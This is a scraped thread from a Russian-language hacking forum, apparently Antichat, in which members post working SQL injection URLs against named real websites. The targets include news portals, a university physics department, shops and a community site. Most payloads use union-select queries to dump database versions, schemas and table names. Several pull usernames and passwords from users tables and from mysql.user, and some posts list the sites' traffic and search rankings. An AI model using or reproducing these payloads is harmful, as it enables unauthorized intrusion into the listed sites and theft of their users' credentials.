SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    novostivl.ru

    PHP:
    http://novostivl.ru/chat/view.php?id=3+or+1+group+by+concat((select+0x76657273696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:2300||PR:5


    ==================================================
     
  2. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Футбольная Лига
    Code:
    http://pfl.ua/articles/?rart=1275979382[COLOR=Red]+order+by+2+--+[/COLOR]
     
    #15602 Unknowhacker, 4 Oct 2013
    Last edited: 4 Oct 2013
  3. semuel7

    semuel7 Member

    Joined:
    16 Apr 2011
    Messages:
    20
    Likes Received:
    14
    Reputations:
    0
    mid-day.com

    PR 3
    ТИЦ 80
    Alexa 6k
     
  4. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.carhs.de/en/training/seminar_functions.php?sem_code=-2045'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+
     
  5. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Помощь Морякам
    Code:
    http://crew-help.com.ua/study_out.php?id=-4+union+select+1,2,3,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29+--+
    Note: Форум phpBB в подарок! :D

    Кафедра физики. Сибирской Государственной Геодезической Академии

    Code:
    http://physics-ssga.ru/news.php?id=-2+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,3,4,5+--+
    Телекоммуникационная компания ООО "МЁБИУС Телеком"
    Code:
    http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
    Note: Крутите, как хотите, но я не нашёл.! :(

    СПОРТ ТРЕЙД
    Code:
    http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
    Прим: Аналогично предыдущему.
     
    #15605 Unknowhacker, 10 Oct 2013
    Last edited: 10 Oct 2013
  6. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    Спроси Алену)
    ТИЦ 750
    трафик почти 10к
    PHP:
    http://www.tonnel.ru/kino.php?id=-245'+union+select+1,2,3,4,5,6,SQL,8,9+--+
    version()-5.0.45
    user()-tonel@localhost
    database()-savinov

    Дальше перестал ковырять
     
  7. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    UP

    pr 5
    =============================================
     
  8. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.vvsforum.no/stilling.php?id=-134+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
     
  9. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Beta SQL :D
    Code:
    http://www.euraxess.hr/sitegenius/article.php?aid=-898+order+by+26+--+
    http://www.narom.no/artikkel.php?aid=2&bid=-56+union+select+1,2,3,4,5,6+--+&oid=944
    http://www.muzkom.net/afisha/show.php?aid=138+order+by+4+--+
    http://www.piiter.ru/authors2.php?aid=36&pid=-629+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16+--+
    http://www.yivoinstitute.org/library/index.php?aid=97tid=112+order+by+9+--+
    http://mat-reshebnic.ru/primer.php?id=-14%27+union+select+1,2,version%28%29+--+
    Code:
    [B]SHIVA LTD[/B]
    http://www.shvidi.com/ru/product_list.php?action=company&typeID=9&id=-17+union+select+1,2,3,4,5,6,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28d60158493.users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,user_name,0x3a,user_pass%29%29%29%29x%29,8+--+
    Loki
    http://www.lokiusa.com/product_list.php?cat=-3+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,3,4,5,6,7,8,9,10,11,12+--+
     
    #15609 Unknowhacker, 15 Oct 2013
    Last edited: 16 Oct 2013
  10. Win32BOT

    Win32BOT Member

    Joined:
    4 Mar 2013
    Messages:
    62
    Likes Received:
    10
    Reputations:
    -3
    Code:
    http://www.catalystpics.co.uk/work.php?id=-7+union+select+1,2,3,4,5,6,7,concat_ws(0x3a ,version(),database(),user()),9,10,11,12,13,group_concat(table_name),15+from+information_schema.tables+where+table_schema=database()+--+
     
  11. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
     
  12. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    UP

    =============================================
    =============================================
    =============================================
     
  13. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    http://encycl.anthropology.ru/article.php?id=1+union+select+1,version(),3,4,5,6,7,8,9,10+--+
     
  14. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    karcher.ru
    2800 тиц, трафа
     
  15. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    http://www.spezrezerv.ru/index.php?cat=2%20union%20select+1,version()--
     
  16. Win32BOT

    Win32BOT Member

    Joined:
    4 Mar 2013
    Messages:
    62
    Likes Received:
    10
    Reputations:
    -3
    Code:
    http://www.me-doc.com.ua/index.php?id=-3543+union+select+1,2,concat_ws(0x3a ,version(),database(),user()),4,5,6,7,8,9,10,11,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()+--+

    Code:
    http://limpopo-fishing.kz/index.php?tid=662+union+select+concat_ws(0x3a ,version(),database(),user()),2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()+--+
    Code:
    http://pushingpetals.com/buy.php?id=-55+union+select+1,concat_ws(0x3a ,version(),database(),user()),group_concat(table_name),4,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=database()+--+
    Code:
    http://o-tula.net/o-server/check-in/protokol.php?id=-24+union+select+concat_ws(0x3a ,version(),database(),user())+--+
     
    #15616 Win32BOT, 25 Oct 2013
    Last edited: 25 Oct 2013
  17. dobryiDyaDya

    dobryiDyaDya New Member

    Joined:
    23 Oct 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    вот:
     
  18. Win32BOT

    Win32BOT Member

    Joined:
    4 Mar 2013
    Messages:
    62
    Likes Received:
    10
    Reputations:
    -3
    Code:
    http://helukabel.su/index.php?id=-68+union+select+1,concat_ws(0x3a,version(),database(),user()),3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()+--+
     
  19. Win32BOT

    Win32BOT Member

    Joined:
    4 Mar 2013
    Messages:
    62
    Likes Received:
    10
    Reputations:
    -3
    Code:
    http://futuresfins.com/fin-detail.php?id=-173+union+select+concat_ws(0x3a,version(),database(),user()),group_concat(table_name),3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()+--+
     
  20. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Code:
    http://www.domkultury.su/news.php?newsid=-41+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,4,5,6+--+
    
    http://www.biomedis.ru/news.php?newsId=-80+and+1=2+union+select+1,2,3,4,5,6+--+
    
    http://www.trunov.com/news.php?newsid=-397+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,version%28%29,5,6,7,8,9+--+&page=1
    
    http://www.ipoteka.md/ru/news.php?NewsID=-483+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
    
    http://www.dia-m.ru/news.php?newsid=-147+union+select+1,2,3,4,5,6,7,8,9,10,11,12,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28mysql.user%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,user,0x3a,password%29%29%29%29x%29,14,15,16+--+
    http://jewishmariupol.com.ua/news.php?newsid=-856+union+select+1,2,3,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28ridnakrai_jewish.users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29,5+--+
    http://www.mastergrisha.ru/news.php?newsid=-71+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,3,4+--+
    http://www.servicesat.ru/news.php?newsid=-49+union+select+1,2,version%28%29,4,5+--+
    http://www.consol.crimea.ua/news.php?newsid=338%27]Consol[/URL] 
    [URL=http://www.parus.biz/news.php?newsid=15+order+by+4+--+]Бизнес Центр "Парус"[/URL]
     
    #15620 Unknowhacker, 28 Oct 2013
    Last edited: 28 Oct 2013
Thread Status:
Not open for further replies.